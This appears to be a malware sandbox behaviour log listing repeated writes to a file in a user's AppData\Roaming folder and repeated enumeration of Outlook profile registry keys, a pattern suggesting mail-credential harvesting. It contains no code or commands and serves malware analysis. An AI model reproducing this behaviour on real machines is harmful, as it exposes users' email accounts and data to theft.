| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 292, size = 6 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 298, size = 26 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 324, size = 46 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 370, size = 32 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 402, size = 20 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 422, size = 4 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 426, size = 12 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 438, size = 82 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 520, size = 18 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 538, size = 24 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 562, size = 26 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 588, size = 36 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 624, size = 26 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 650, size = 22 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 672, size = 12 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 684, size = 36 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 720, size = 24 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 744, size = 16 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 760, size = 24 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 784, size = 16 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 800, size = 20 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 820, size = 18 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 838, size = 46 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 884, size = 6 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 890, size = 32 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 922, size = 16 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 938, size = 46 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 984, size = 196 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 1180, size = 48 |
|
1 | |
| File | Create | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, desired_access = FILE_READ_DATA, FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_READ_EA, FILE_WRITE_EA, FILE_READ_ATTRIBUTES, FILE_WRITE_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 | |
| File | Get Info | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, type = extended |
|
1 | |
| File | Write | filename = \??\C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\OLO0NDS-\OLOlogrc.ini, offset = 1228, size = 28 |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_USERS\S-1-5-21-3328211038-939451286-342010794-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
